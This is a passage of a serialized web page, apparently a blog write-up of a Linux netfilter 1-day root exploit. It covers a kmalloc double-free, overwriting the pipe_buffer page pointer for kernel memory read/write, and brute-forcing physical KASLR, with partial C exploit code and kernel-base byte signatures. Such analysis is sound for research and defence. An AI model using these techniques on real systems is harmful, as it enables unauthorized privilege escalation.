MTYPE_SECONDARY;\n",{"type":24,"tag":301,"props":64842,"children":64843},{"class":303,"line":652},[64844,64848,64852,64856,64860,64864,64868,64872,64876,64880],{"type":24,"tag":301,"props":64845,"children":64846},{"style":314},[64847],{"type":30,"value":64778},{"type":24,"tag":301,"props":64849,"children":64850},{"style":359},[64851],{"type":30,"value":362},{"type":24,"tag":301,"props":64853,"children":64854},{"style":369},[64855],{"type":30,"value":64584},{"type":24,"tag":301,"props":64857,"children":64858},{"style":359},[64859],{"type":30,"value":64791},{"type":24,"tag":301,"props":64861,"children":64862},{"style":466},[64863],{"type":30,"value":5154},{"type":24,"tag":301,"props":64865,"children":64866},{"style":385},[64867],{"type":30,"value":3407},{"type":24,"tag":301,"props":64869,"children":64870},{"style":466},[64871],{"type":30,"value":64804},{"type":24,"tag":301,"props":64873,"children":64874},{"style":359},[64875],{"type":30,"value":377},{"type":24,"tag":301,"props":64877,"children":64878},{"style":466},[64879],{"type":30,"value":584},{"type":24,"tag":301,"props":64881,"children":64882},{"style":359},[64883],{"type":30,"value":589},{"type":24,"tag":301,"props":64885,"children":64886},{"class":303,"line":666},[64887],{"type":24,"tag":301,"props":64888,"children":64889},{"style":359},[64890],{"type":30,"value":501},{"type":24,"tag":301,"props":64892,"children":64893},{"class":303,"line":674},[64894],{"type":24,"tag":301,"props":64895,"children":64896},{"style":1062},[64897],{"type":30,"value":64898}," // Prepare evil msg\n",{"type":24,"tag":301,"props":64900,"children":64901},{"class":303,"line":692},[64902,64906,64911,64915,64919,64923,64927,64931],{"type":24,"tag":301,"props":64903,"children":64904},{"style":348},[64905],{"type":30,"value":407},{"type":24,"tag":301,"props":64907,"children":64908},{"style":359},[64909],{"type":30,"value":64910}," evilqid ",{"type":24,"tag":301,"props":64912,"children":64913},{"style":385},[64914],{"type":30,"value":523},{"type":24,"tag":301,"props":64916,"children":64917},{"style":314},[64918],{"type":30,"value":64549},{"type":24,"tag":301,"props":64920,"children":64921},{"style":359},[64922],{"type":30,"value":64554},{"type":24,"tag":301,"props":64924,"children":64925},{"style":466},[64926],{"type":30,"value":64559},{"type":24,"tag":301,"props":64928,"children":64929},{"style":385},[64930],{"type":30,"value":11095},{"type":24,"tag":301,"props":64932,"children":64933},{"style":359},[64934],{"type":30,"value":64568},{"type":24,"tag":301,"props":64936,"children":64937},{"class":303,"line":3631},[64938,64942,64947,64951,64955],{"type":24,"tag":301,"props":64939,"children":64940},{"style":308},[64941],{"type":30,"value":453},{"type":24,"tag":301,"props":64943,"children":64944},{"style":359},[64945],{"type":30,"value":64946}," (evilqid ",{"type":24,"tag":301,"props":64948,"children":64949},{"style":385},[64950],{"type":30,"value":1849},{"type":24,"tag":301,"props":64952,"children":64953},{"style":466},[64954],{"type":30,"value":685},{"type":24,"tag":301,"props":64956,"children":64957},{"style":359},[64958],{"type":30,"value":791},{"type":24,"tag":301,"props":64960,"children":64961},{"class":303,"line":3639},[64962],{"type":24,"tag":301,"props":64963,"children":64964},{"style":359},[64965],{"type":30,"value":35943},{"type":24,"tag":301,"props":64967,"children":64968},{"class":303,"line":3647},[64969,64974,64978,64982],{"type":24,"tag":301,"props":64970,"children":64971},{"style":314},[64972],{"type":30,"value":64973}," perror",{"type":24,"tag":301,"props":64975,"children":64976},{"style":359},[64977],{"type":30,"value":362},{"type":24,"tag":301,"props":64979,"children":64980},{"style":329},[64981],{"type":30,"value":64624},{"type":24,"tag":301,"props":64983,"children":64984},{"style":359},[64985],{"type":30,"value":589},{"type":24,"tag":301,"props":64987,"children":64988},{"class":303,"line":3685},[64989],{"type":24,"tag":301,"props":64990,"children":64991},{"style":359},[64992],{"type":30,"value":501},{"type":24,"tag":301,"props":64994,"children":64995},{"class":303,"line":3713},[64996],{"type":24,"tag":301,"props":64997,"children":64998},{"style":359},[64999],{"type":30,"value":65000},"[...] // trigger double-free in kmalloc-256\n",{"type":24,"tag":80,"props":65002,"children":65004},{"id":65003},"using-pipe_buffer-page-pointer-for-physical-readwrite",[65005],{"type":30,"value":65006},"Using pipe_buffer->page pointer for physical read/write",{"type":24,"tag":32,"props":65008,"children":65009},{},[65010,65012,65018,65019,65025,65026,65032,65034,65040],{"type":30,"value":65011},"Now that we have increased the reach of our double-free, it's probably a good idea to go to ",{"type":24,"tag":145,"props":65013,"children":65015},{"className":65014},[],[65016],{"type":30,"value":65017},"kmalloc-1k",{"type":30,"value":2378},{"type":24,"tag":145,"props":65020,"children":65022},{"className":65021},[],[65023],{"type":30,"value":65024},"overlap pipe_buffer",{"type":30,"value":28273},{"type":24,"tag":145,"props":65027,"children":65029},{"className":65028},[],[65030],{"type":30,"value":65031},"skbuf",{"type":30,"value":65033}," data to control the ",{"type":24,"tag":145,"props":65035,"children":65037},{"className":65036},[],[65038],{"type":30,"value":65039},"page",{"type":30,"value":65041}," field.",{"type":24,"tag":32,"props":65043,"children":65044},{},[65045,65046,65051,65053,65059,65061],{"type":30,"value":8079},{"type":24,"tag":145,"props":65047,"children":65049},{"className":65048},[],[65050],{"type":30,"value":65039},{"type":30,"value":65052}," field is a pointer into ",{"type":24,"tag":145,"props":65054,"children":65056},{"className":65055},[],[65057],{"type":30,"value":65058},"vmemmap_base",{"type":30,"value":65060},", which contains all page structs used to track memory mapped to the kernel. This pointer is used to fetch the address of the data associated with a given pipe when reading/writing.\n",{"type":24,"tag":177,"props":65062,"children":65064},{"alt":179,"src":65063},"/posts/netfilter-universal-root-1-day/pipe-buffer.png",[],{"type":24,"tag":32,"props":65066,"children":65067},{},[65068,65070,65075],{"type":30,"value":65069},"This now allows us to navigate the ",{"type":24,"tag":145,"props":65071,"children":65073},{"className":65072},[],[65074],{"type":30,"value":65058},{"type":30,"value":65076}," array and use our pipe as an interface to read/write kernel memory directly.",{"type":24,"tag":80,"props":65078,"children":65080},{"id":65079},"bruteforce-physical-kernel-base",[65081],{"type":30,"value":65082},"Bruteforce physical kernel base",{"type":24,"tag":32,"props":65084,"children":65085},{},[65086,65088,65094,65096,65101,65103,65109],{"type":30,"value":65087},"With the capability to iterate over kernel memory pages and read/write them, we could easily look for any value we want to overwrite, such as ",{"type":24,"tag":145,"props":65089,"children":65091},{"className":65090},[],[65092],{"type":30,"value":65093},"modprobe_path",{"type":30,"value":65095},". Keep in mind that simply searching page by page from the start of ",{"type":24,"tag":145,"props":65097,"children":65099},{"className":65098},[],[65100],{"type":30,"value":65058},{"type":30,"value":65102}," can be very time-consuming because the physical address at which the kernel base is loaded is randomized. However, the start of the kernel base is always aligned by a constant ",{"type":24,"tag":145,"props":65104,"children":65106},{"className":65105},[],[65107],{"type":30,"value":65108},"PHYSICAL_ALIGN",{"type":30,"value":65110}," value, 0x200000 by default in amd64, so we can significantly speed up our search by first only looking at aligned addresses for something that looks like the kernel base and then start a page by page search from there.",{"type":24,"tag":291,"props":65112,"children":65114},{"className":35866,"code":65113,"language":35868,"meta":7,"style":7},"[...]\n// Bruteforce phys-KASLR\n uint64_t kernel_base;\n bool found = false;\n uint8_t data[PAGE_SIZE] = {0};\n puts(\"[*] bruteforce phys-KASLR\");\n for (uint64_t i = 0;; i++)\n {\n kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);\n pipebuf->page = vmemmap_base + kernel_base;\n pipebuf->offset = 0;\n pipebuf->len = PAGE_SIZE + 1;\n[...]\n for (int j = 0; j \u003C PIPE_SPRAY; j++)\n {\n memset(&data, 0, PAGE_SIZE);\n int count;\n if (count = read(pfd[j][0], &data, PAGE_SIZE) \u003C 0)\n {\n continue;\n }\n[...]\n\n if (is_kernel_base(data)) // [1] identify kernel base\n {\n found = true;\n break;\n }\n }\n\n[...]\n",[65115],{"type":24,"tag":145,"props":65116,"children":65117},{"__ignoreMap":7},[65118,65125,65133,65141,65165,65198,65218,65258,65265,65309,65343,65370,65406,65413,65459,65466,65496,65509,65574,65581,65593,65601,65608,65615,65641,65648,65668,65680,65687,65694,65701],{"type":24,"tag":301,"props":65119,"children":65120},{"class":303,"line":304},[65121],{"type":24,"tag":301,"props":65122,"children":65123},{"style":359},[65124],{"type":30,"value":17123},{"type":24,"tag":301,"props":65126,"children":65127},{"class":303,"line":320},[65128],{"type":24,"tag":301,"props":65129,"children":65130},{"style":359},[65131],{"type":30,"value":65132},"// Bruteforce phys-KASLR\n",{"type":24,"tag":301,"props":65134,"children":65135},{"class":303,"line":335},[65136],{"type":24,"tag":301,"props":65137,"children":65138},{"style":359},[65139],{"type":30,"value":65140}," uint64_t kernel_base;\n",{"type":24,"tag":301,"props":65142,"children":65143},{"class":303,"line":344},[65144,65148,65153,65157,65161],{"type":24,"tag":301,"props":65145,"children":65146},{"style":348},[65147],{"type":30,"value":53209},{"type":24,"tag":301,"props":65149,"children":65150},{"style":359},[65151],{"type":30,"value":65152}," found ",{"type":24,"tag":301,"props":65154,"children":65155},{"style":385},[65156],{"type":30,"value":523},{"type":24,"tag":301,"props":65158,"children":65159},{"style":348},[65160],{"type":30,"value":3613},{"type":24,"tag":301,"props":65162,"children":65163},{"style":359},[65164],{"type":30,"value":492},{"type":24,"tag":301,"props":65166,"children":65167},{"class":303,"line":401},[65168,65173,65177,65182,65186,65190,65194],{"type":24,"tag":301,"props":65169,"children":65170},{"style":348},[65171],{"type":30,"value":65172}," uint8_t",{"type":24,"tag":301,"props":65174,"children":65175},{"style":369},[65176],{"type":30,"value":21895},{"type":24,"tag":301,"props":65178,"children":65179},{"style":359},[65180],{"type":30,"value":65181},"[PAGE_SIZE] ",{"type":24,"tag":301,"props":65183,"children":65184},{"style":385},[65185],{"type":30,"value":523},{"type":24,"tag":301,"props":65187,"children":65188},{"style":359},[65189],{"type":30,"value":51953},{"type":24,"tag":301,"props":65191,"children":65192},{"style":466},[65193],{"type":30,"value":584},{"type":24,"tag":301,"props":65195,"children":65196},{"style":359},[65197],{"type":30,"value":3118},{"type":24,"tag":301,"props":65199,"children":65200},{"class":303,"line":415},[65201,65205,65209,65214],{"type":24,"tag":301,"props":65202,"children":65203},{"style":314},[65204],{"type":30,"value":62229},{"type":24,"tag":301,"props":65206,"children":65207},{"style":359},[65208],{"type":30,"value":362},{"type":24,"tag":301,"props":65210,"children":65211},{"style":329},[65212],{"type":30,"value":65213},"\"[*] bruteforce phys-KASLR\"",{"type":24,"tag":301,"props":65215,"children":65216},{"style":359},[65217],{"type":30,"value":589},{"type":24,"tag":301,"props":65219,"children":65220},{"class":303,"line":439},[65221,65225,65229,65233,65237,65241,65245,65250,65254],{"type":24,"tag":301,"props":65222,"children":65223},{"style":308},[65224],{"type":30,"value":3249},{"type":24,"tag":301,"props":65226,"children":65227},{"style":359},[65228],{"type":30,"value":873},{"type":24,"tag":301,"props":65230,"children":65231},{"style":348},[65232],{"type":30,"value":6020},{"type":24,"tag":301,"props":65234,"children":65235},{"style":359},[65236],{"type":30,"value":1998},{"type":24,"tag":301,"props":65238,"children":65239},{"style":385},[65240],{"type":30,"value":523},{"type":24,"tag":301,"props":65242,"children":65243},{"style":466},[65244],{"type":30,"value":685},{"type":24,"tag":301,"props":65246,"children":65247},{"style":359},[65248],{"type":30,"value":65249},";; i",{"type":24,"tag":301,"props":65251,"children":65252},{"style":385},[65253],{"type":30,"value":1859},{"type":24,"tag":301,"props":65255,"children":65256},{"style":359},[65257],{"type":30,"value":791},{"type":24,"tag":301,"props":65259,"children":65260},{"class":303,"line":447},[65261],{"type":24,"tag":301,"props":65262,"children":65263},{"style":359},[65264],{"type":30,"value":35943},{"type":24,"tag":301,"props":65266,"children":65267},{"class":303,"line":476},[65268,65273,65277,65282,65286,65291,65295,65300,65304],{"type":24,"tag":301,"props":65269,"children":65270},{"style":359},[65271],{"type":30,"value":65272}," kernel_base ",{"type":24,"tag":301,"props":65274,"children":65275},{"style":385},[65276],{"type":30,"value":523},{"type":24,"tag":301,"props":65278,"children":65279},{"style":466},[65280],{"type":30,"value":65281}," 0x40",{"type":24,"tag":301,"props":65283,"children":65284},{"style":385},[65285],{"type":30,"value":431},{"type":24,"tag":301,"props":65287,"children":65288},{"style":359},[65289],{"type":30,"value":65290}," ((PHYSICAL_ALIGN ",{"type":24,"tag":301,"props":65292,"children":65293},{"style":385},[65294],{"type":30,"value":772},{"type":24,"tag":301,"props":65296,"children":65297},{"style":359},[65298],{"type":30,"value":65299}," i) ",{"type":24,"tag":301,"props":65301,"children":65302},{"style":385},[65303],{"type":30,"value":19556},{"type":24,"tag":301,"props":65305,"children":65306},{"style":359},[65307],{"type":30,"value":65308}," PAGE_SHIFT);\n",{"type":24,"tag":301,"props":65310,"children":65311},{"class":303,"line":495},[65312,65317,65321,65325,65329,65334,65338],{"type":24,"tag":301,"props":65313,"children":65314},{"style":369},[65315],{"type":30,"value":65316}," pipebuf",{"type":24,"tag":301,"props":65318,"children":65319},{"style":359},[65320],{"type":30,"value":882},{"type":24,"tag":301,"props":65322,"children":65323},{"style":369},[65324],{"type":30,"value":65039},{"type":24,"tag":301,"props":65326,"children":65327},{"style":385},[65328],{"type":30,"value":2537},{"type":24,"tag":301,"props":65330,"children":65331},{"style":359},[65332],{"type":30,"value":65333}," vmemmap_base ",{"type":24,"tag":301,"props":65335,"children":65336},{"style":385},[65337],{"type":30,"value":11206},{"type":24,"tag":301,"props":65339,"children":65340},{"style":359},[65341],{"type":30,"value":65342}," kernel_base;\n",{"type":24,"tag":301,"props":65344,"children":65345},{"class":303,"line":504},[65346,65350,65354,65358,65362,65366],{"type":24,"tag":301,"props":65347,"children":65348},{"style":369},[65349],{"type":30,"value":65316},{"type":24,"tag":301,"props":65351,"children":65352},{"style":359},[65353],{"type":30,"value":882},{"type":24,"tag":301,"props":65355,"children":65356},{"style":369},[65357],{"type":30,"value":20694},{"type":24,"tag":301,"props":65359,"children":65360},{"style":385},[65361],{"type":30,"value":2537},{"type":24,"tag":301,"props":65363,"children":65364},{"style":466},[65365],{"type":30,"value":685},{"type":24,"tag":301,"props":65367,"children":65368},{"style":359},[65369],{"type":30,"value":492},{"type":24,"tag":301,"props":65371,"children":65372},{"class":303,"line":512},[65373,65377,65381,65385,65389,65394,65398,65402],{"type":24,"tag":301,"props":65374,"children":65375},{"style":369},[65376],{"type":30,"value":65316},{"type":24,"tag":301,"props":65378,"children":65379},{"style":359},[65380],{"type":30,"value":882},{"type":24,"tag":301,"props":65382,"children":65383},{"style":369},[65384],{"type":30,"value":6156},{"type":24,"tag":301,"props":65386,"children":65387},{"style":385},[65388],{"type":30,"value":2537},{"type":24,"tag":301,"props":65390,"children":65391},{"style":359},[65392],{"type":30,"value":65393}," PAGE_SIZE ",{"type":24,"tag":301,"props":65395,"children":65396},{"style":385},[65397],{"type":30,"value":11206},{"type":24,"tag":301,"props":65399,"children":65400},{"style":466},[65401],{"type":30,"value":487},{"type":24,"tag":301,"props":65403,"children":65404},{"style":359},[65405],{"type":30,"value":492},{"type":24,"tag":301,"props":65407,"children":65408},{"class":303,"line":592},[65409],{"type":24,"tag":301,"props":65410,"children":65411},{"style":359},[65412],{"type":30,"value":17123},{"type":24,"tag":301,"props":65414,"children":65415},{"class":303,"line":619},[65416,65421,65425,65429,65433,65437,65442,65446,65451,65455],{"type":24,"tag":301,"props":65417,"children":65418},{"style":359},[65419],{"type":30,"value":65420}," for (",{"type":24,"tag":301,"props":65422,"children":65423},{"style":348},[65424],{"type":30,"value":351},{"type":24,"tag":301,"props":65426,"children":65427},{"style":369},[65428],{"type":30,"value":15437},{"type":24,"tag":301,"props":65430,"children":65431},{"style":385},[65432],{"type":30,"value":2537},{"type":24,"tag":301,"props":65434,"children":65435},{"style":466},[65436],{"type":30,"value":685},{"type":24,"tag":301,"props":65438,"children":65439},{"style":359},[65440],{"type":30,"value":65441},"; j ",{"type":24,"tag":301,"props":65443,"children":65444},{"style":385},[65445],{"type":30,"value":1849},{"type":24,"tag":301,"props":65447,"children":65448},{"style":359},[65449],{"type":30,"value":65450}," PIPE_SPRAY; j",{"type":24,"tag":301,"props":65452,"children":65453},{"style":385},[65454],{"type":30,"value":1859},{"type":24,"tag":301,"props":65456,"children":65457},{"style":359},[65458],{"type":30,"value":791},{"type":24,"tag":301,"props":65460,"children":65461},{"class":303,"line":635},[65462],{"type":24,"tag":301,"props":65463,"children":65464},{"style":359},[65465],{"type":30,"value":38411},{"type":24,"tag":301,"props":65467,"children":65468},{"class":303,"line":643},[65469,65474,65478,65482,65487,65491],{"type":24,"tag":301,"props":65470,"children":65471},{"style":314},[65472],{"type":30,"value":65473}," memset",{"type":24,"tag":301,"props":65475,"children":65476},{"style":359},[65477],{"type":30,"value":362},{"type":24,"tag":301,"props":65479,"children":65480},{"style":385},[65481],{"type":30,"value":556},{"type":24,"tag":301,"props":65483,"children":65484},{"style":359},[65485],{"type":30,"value":65486},"data, ",{"type":24,"tag":301,"props":65488,"children":65489},{"style":466},[65490],{"type":30,"value":584},{"type":24,"tag":301,"props":65492,"children":65493},{"style":359},[65494],{"type":30,"value":65495},", PAGE_SIZE);\n",{"type":24,"tag":301,"props":65497,"children":65498},{"class":303,"line":652},[65499,65504],{"type":24,"tag":301,"props":65500,"children":65501},{"style":348},[65502],{"type":30,"value":65503}," int",{"type":24,"tag":301,"props":65505,"children":65506},{"style":359},[65507],{"type":30,"value":65508}," count;\n",{"type":24,"tag":301,"props":65510,"children":65511},{"class":303,"line":666},[65512,65517,65522,65526,65531,65535,65540,65545,65549,65553,65557,65562,65566,65570],{"type":24,"tag":301,"props":65513,"children":65514},{"style":308},[65515],{"type":30,"value":65516}," if",{"type":24,"tag":301,"props":65518,"children":65519},{"style":359},[65520],{"type":30,"value":65521}," (count ",{"type":24,"tag":301,"props":65523,"children":65524},{"style":385},[65525],{"type":30,"value":523},{"type":24,"tag":301,"props":65527,"children":65528},{"style":314},[65529],{"type":30,"value":65530}," read",{"type":24,"tag":301,"props":65532,"children":65533},{"style":359},[65534],{"type":30,"value":362},{"type":24,"tag":301,"props":65536,"children":65537},{"style":369},[65538],{"type":30,"value":65539},"pfd",{"type":24,"tag":301,"props":65541,"children":65542},{"style":359},[65543],{"type":30,"value":65544},"[j][",{"type":24,"tag":301,"props":65546,"children":65547},{"style":466},[65548],{"type":30,"value":584},{"type":24,"tag":301,"props":65550,"children":65551},{"style":359},[65552],{"type":30,"value":551},{"type":24,"tag":301,"props":65554,"children":65555},{"style":385},[65556],{"type":30,"value":556},{"type":24,"tag":301,"props":65558,"children":65559},{"style":359},[65560],{"type":30,"value":65561},"data, PAGE_SIZE) ",{"type":24,"tag":301,"props":65563,"children":65564},{"style":385},[65565],{"type":30,"value":1849},{"type":24,"tag":301,"props":65567,"children":65568},{"style":466},[65569],{"type":30,"value":685},{"type":24,"tag":301,"props":65571,"children":65572},{"style":359},[65573],{"type":30,"value":791},{"type":24,"tag":301,"props":65575,"children":65576},{"class":303,"line":674},[65577],{"type":24,"tag":301,"props":65578,"children":65579},{"style":359},[65580],{"type":30,"value":38447},{"type":24,"tag":301,"props":65582,"children":65583},{"class":303,"line":692},[65584,65589],{"type":24,"tag":301,"props":65585,"children":65586},{"style":308},[65587],{"type":30,"value":65588}," continue",{"type":24,"tag":301,"props":65590,"children":65591},{"style":359},[65592],{"type":30,"value":492},{"type":24,"tag":301,"props":65594,"children":65595},{"class":303,"line":3631},[65596],{"type":24,"tag":301,"props":65597,"children":65598},{"style":359},[65599],{"type":30,"value":65600}," }\n",{"type":24,"tag":301,"props":65602,"children":65603},{"class":303,"line":3639},[65604],{"type":24,"tag":301,"props":65605,"children":65606},{"style":359},[65607],{"type":30,"value":17123},{"type":24,"tag":301,"props":65609,"children":65610},{"class":303,"line":3647},[65611],{"type":24,"tag":301,"props":65612,"children":65613},{"emptyLinePlaceholder":16},[65614],{"type":30,"value":341},{"type":24,"tag":301,"props":65616,"children":65617},{"class":303,"line":3685},[65618,65623,65628,65632,65636],{"type":24,"tag":301,"props":65619,"children":65620},{"style":359},[65621],{"type":30,"value":65622}," if (",{"type":24,"tag":301,"props":65624,"children":65625},{"style":10246},[65626],{"type":30,"value":65627},"is_kernel_base",{"type":24,"tag":301,"props":65629,"children":65630},{"style":359},[65631],{"type":30,"value":362},{"type":24,"tag":301,"props":65633,"children":65634},{"style":10246},[65635],{"type":30,"value":10528},{"type":24,"tag":301,"props":65637,"children":65638},{"style":359},[65639],{"type":30,"value":65640},")) // [1] identify kernel base\n",{"type":24,"tag":301,"props":65642,"children":65643},{"class":303,"line":3713},[65644],{"type":24,"tag":301,"props":65645,"children":65646},{"style":359},[65647],{"type":30,"value":38447},{"type":24,"tag":301,"props":65649,"children":65650},{"class":303,"line":3721},[65651,65656,65660,65664],{"type":24,"tag":301,"props":65652,"children":65653},{"style":359},[65654],{"type":30,"value":65655}," found ",{"type":24,"tag":301,"props":65657,"children":65658},{"style":385},[65659],{"type":30,"value":523},{"type":24,"tag":301,"props":65661,"children":65662},{"style":348},[65663],{"type":30,"value":3440},{"type":24,"tag":301,"props":65665,"children":65666},{"style":359},[65667],{"type":30,"value":492},{"type":24,"tag":301,"props":65669,"children":65670},{"class":303,"line":3751},[65671,65676],{"type":24,"tag":301,"props":65672,"children":65673},{"style":308},[65674],{"type":30,"value":65675}," break",{"type":24,"tag":301,"props":65677,"children":65678},{"style":359},[65679],{"type":30,"value":492},{"type":24,"tag":301,"props":65681,"children":65682},{"class":303,"line":3782},[65683],{"type":24,"tag":301,"props":65684,"children":65685},{"style":359},[65686],{"type":30,"value":65600},{"type":24,"tag":301,"props":65688,"children":65689},{"class":303,"line":3791},[65690],{"type":24,"tag":301,"props":65691,"children":65692},{"style":359},[65693],{"type":30,"value":3345},{"type":24,"tag":301,"props":65695,"children":65696},{"class":303,"line":3819},[65697],{"type":24,"tag":301,"props":65698,"children":65699},{"emptyLinePlaceholder":16},[65700],{"type":30,"value":341},{"type":24,"tag":301,"props":65702,"children":65703},{"class":303,"line":4397},[65704],{"type":24,"tag":301,"props":65705,"children":65706},{"style":359},[65707],{"type":30,"value":17123},{"type":24,"tag":32,"props":65709,"children":65710},{},[65711,65713,65717,65719,65725,65727,65731],{"type":30,"value":65712},"Notice that at ",{"type":24,"tag":301,"props":65714,"children":65715},{},[65716],{"type":30,"value":546},{"type":30,"value":65718}," we call the ",{"type":24,"tag":145,"props":65720,"children":65722},{"className":65721},[],[65723],{"type":30,"value":65724},"is_kernel_base()",{"type":30,"value":65726}," function. This is a function based on lau's exploit ",{"type":24,"tag":301,"props":65728,"children":65729},{},[65730],{"type":30,"value":24886},{"type":30,"value":65732}," that basically matches for multiple byte patterns that may exist at the kernel base page across different builds, to maximize compatibility.",{"type":24,"tag":291,"props":65734,"children":65736},{"className":35866,"code":65735,"language":35868,"meta":7,"style":7},"[...]\nstatic bool is_kernel_base(unsigned char *addr)\n{\n // thanks lau :)\n\n // get-sig kernel_runtime_1\n if (memcmp(addr + 0x0, \"\\x48\\x8d\\x25\\x51\\x3f\", 5) == 0 &&\n memcmp(addr + 0x7, \"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff\", 7) == 0)\n return true;\n\n // get-sig kernel_runtime_2\n if (memcmp(addr + 0x0, \"\\xfc\\x0f\\x01\\x15\", 4) == 0 &&\n memcmp(addr + 0x8, \"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf\", 12) == 0 &&\n memcmp(addr + 0x18, \"\\x89\\xde\\x8b\\x0d\", 4) == 0 &&\n memcmp(addr + 0x20, \"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc\", 6) == 0 &&\n memcmp(addr + 0x2a, \"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00\", 24) == 0 &&\n memcmp(addr + 0x45, \"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00\", 15) == 0 &&\n memcmp(addr + 0x55, \"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8\", 8) == 0 &&\n memcmp(addr + 0x61, \"\\x31\\xd2\\x0f\\x30\\xe8\", 5) == 0 &&\n memcmp(addr + 0x6a, \"\\x48\\xc7\\xc6\", 3) == 0 &&\n memcmp(addr + 0x71, \"\\x48\\xc7\\xc0\\x80\\x00\\x00\", 6) == 0 &&\n memcmp(addr + 0x78, \"\\xff\\xe0\", 2) == 0)\n return true;\n\n return false;\n}\n[...]\n",[65737],{"type":24,"tag":145,"props":65738,"children":65739},{"__ignoreMap":7},[65740,65747,65776,65783,65791,65798,65806,65877,65939,65954,65961,65969,66037,66099,66160,66221,66283,66345,66406,66467,66528,66589,66650,66665,66672,66687,66694],{"type":24,"tag":301,"props":65741,"children":65742},{"class":303,"line":304},[65743],{"type":24,"tag":301,"props":65744,"children":65745},{"style":359},[65746],{"type":30,"value":17123},{"type":24,"tag":301,"props":65748,"children":65749},{"class":303,"line":320},[65750,65755,65760,65764,65768,65772],{"type":24,"tag":301,"props":65751,"children":65752},{"style":359},[65753],{"type":30,"value":65754},"static bool is_kernel_base(",{"type":24,"tag":301,"props":65756,"children":65757},{"style":348},[65758],{"type":30,"value":65759},"unsigned",{"type":24,"tag":301,"props":65761,"children":65762},{"style":348},[65763],{"type":30,"value":426},{"type":24,"tag":301,"props":65765,"children":65766},{"style":348},[65767],{"type":30,"value":431},{"type":24,"tag":301,"props":65769,"children":65770},{"style":369},[65771],{"type":30,"value":7765},{"type":24,"tag":301,"props":65773,"children":65774},{"style":359},[65775],{"type":30,"value":791},{"type":24,"tag":301,"props":65777,"children":65778},{"class":303,"line":335},[65779],{"type":24,"tag":301,"props":65780,"children":65781},{"style":359},[65782],{"type":30,"value":799},{"type":24,"tag":301,"props":65784,"children":65785},{"class":303,"line":344},[65786],{"type":24,"tag":301,"props":65787,"children":65788},{"style":1062},[65789],{"type":30,"value":65790}," // thanks lau :)\n",{"type":24,"tag":301,"props":65792,"children":65793},{"class":303,"line":401},[65794],{"type":24,"tag":301,"props":65795,"children":65796},{"emptyLinePlaceholder":16},[65797],{"type":30,"value":341},{"type":24,"tag":301,"props":65799,"children":65800},{"class":303,"line":415},[65801],{"type":24,"tag":301,"props":65802,"children":65803},{"style":1062},[65804],{"type":30,"value":65805}," // get-sig kernel_runtime_1\n",{"type":24,"tag":301,"props":65807,"children":65808},{"class":303,"line":439},[65809,65813,65817,65822,65827,65831,65836,65840,65844,65849,65853,65857,65861,65865,65869,65873],{"type":24,"tag":301,"props":65810,"children":65811},{"style":308},[65812],{"type":30,"value":453},{"type":24,"tag":301,"props":65814,"children":65815},{"style":359},[65816],{"type":30,"value":873},{"type":24,"tag":301,"props":65818,"children":65819},{"style":314},[65820],{"type":30,"value":65821},"memcmp",{"type":24,"tag":301,"props":65823,"children":65824},{"style":359},[65825],{"type":30,"value":65826},"(addr ",{"type":24,"tag":301,"props":65828,"children":65829},{"style":385},[65830],{"type":30,"value":11206},{"type":24,"tag":301,"props":65832,"children":65833},{"style":466},[65834],{"type":30,"value":65835}," 0x0",{"type":24,"tag":301,"props":65837,"children":65838},{"style":359},[65839],{"type":30,"value":377},{"type":24,"tag":301,"props":65841,"children":65842},{"style":329},[65843],{"type":30,"value":9408},{"type":24,"tag":301,"props":65845,"children":65846},{"style":9400},[65847],{"type":30,"value":65848},"\\x48\\x8d\\x25\\x51\\x3f",{"type":24,"tag":301,"props":65850,"children":65851},{"style":329},[65852],{"type":30,"value":9408},{"type":24,"tag":301,"props":65854,"children":65855},{"style":359},[65856],{"type":30,"value":377},{"type":24,"tag":301,"props":65858,"children":65859},{"style":466},[65860],{"type":30,"value":24886},{"type":24,"tag":301,"props":65862,"children":65863},{"style":359},[65864],{"type":30,"value":911},{"type":24,"tag":301,"props":65866,"children":65867},{"style":385},[65868],{"type":30,"value":607},{"type":24,"tag":301,"props":65870,"children":65871},{"style":466},[65872],{"type":30,"value":685},{"type":24,"tag":301,"props":65874,"children":65875},{"style":385},[65876],{"type":30,"value":59408},{"type":24,"tag":301,"props":65878,"children":65879},{"class":303,"line":447},[65880,65885,65889,65893,65898,65902,65906,65911,65915,65919,65923,65927,65931,65935],{"type":24,"tag":301,"props":65881,"children":65882},{"style":314},[65883],{"type":30,"value":65884}," memcmp",{"type":24,"tag":301,"props":65886,"children":65887},{"style":359},[65888],{"type":30,"value":65826},{"type":24,"tag":301,"props":65890,"children":65891},{"style":385},[65892],{"type":30,"value":11206},{"type":24,"tag":301,"props":65894,"children":65895},{"style":466},[65896],{"type":30,"value":65897}," 0x7",{"type":24,"tag":301,"props":65899,"children":65900},{"style":359},[65901],{"type":30,"value":377},{"type":24,"tag":301,"props":65903,"children":65904},{"style":329},[65905],{"type":30,"value":9408},{"type":24,"tag":301,"props":65907,"children":65908},{"style":9400},[65909],{"type":30,"value":65910},"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff",{"type":24,"tag":301,"props":65912,"children":65913},{"style":329},[65914],{"type":30,"value":9408},{"type":24,"tag":301,"props":65916,"children":65917},{"style":359},[65918],{"type":30,"value":377},{"type":24,"tag":301,"props":65920,"children":65921},{"style":466},[65922],{"type":30,"value":61393},{"type":24,"tag":301,"props":65924,"children":65925},{"style":359},[65926],{"type":30,"value":911},{"type":24,"tag":301,"props":65928,"children":65929},{"style":385},[65930],{"type":30,"value":607},{"type":24,"tag":301,"props":65932,"children":65933},{"style":466},[65934],{"type":30,"value":685},{"type":24,"tag":301,"props":65936,"children":65937},{"style":359},[65938],{"type":30,"value":791},{"type":24,"tag":301,"props":65940,"children":65941},{"class":303,"line":476},[65942,65946,65950],{"type":24,"tag":301,"props":65943,"children":65944},{"style":308},[65945],{"type":30,"value":482},{"type":24,"tag":301,"props":65947,"children":65